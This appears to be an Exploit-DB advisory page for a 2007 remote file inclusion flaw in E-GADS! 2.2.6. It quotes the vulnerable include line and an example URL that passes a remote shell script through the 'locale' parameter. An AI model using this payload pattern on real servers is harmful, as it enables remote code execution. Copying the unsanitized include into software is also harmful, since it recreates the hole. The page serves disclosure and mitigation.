E-GADS! 2.2.6 Remote File Inclusion Vulnerability

vendor:

E-GADS!

by:

Unknown

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: E-GADS!

Affected Version From: 2.2.2006

Affected Version To: 2.2.2006

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

E-GADS! 2.2.6 Remote File Inclusion Vulnerability

This vulnerability allows an attacker to include remote files in the 'common.php' file. By manipulating the 'locale' parameter, an attacker can execute arbitrary code on the server.

Mitigation:

Patch or upgrade to a secure version of the software. Additionally, sanitize user input before including files.

Source

Exploit-DB raw data:

##############################################################################################
##############################################################################################
#E-GADS! 2.2.6 Remote File Inclusion Vulnerability
#
#Dork::(
#
#Vuln Code
###################################################################################
#
#ERROR:common.php
#
# require ("$locale/locale.php");
#
#BUG:
#
#Example:http://site.com/path/common.php?locale=[[Sh3LL Script]]
#
#Script Download
#############################################################################
#https://sourceforge.net/project/showfiles.php?group_id=88942&package_id=93125&release_id=444821
#
#Special Thanks:##### x0r0n ##### ajan ##### siircicocuk
#####################################
##############################################################################################
##############################################################################################

# milw0rm.com [2007-05-04]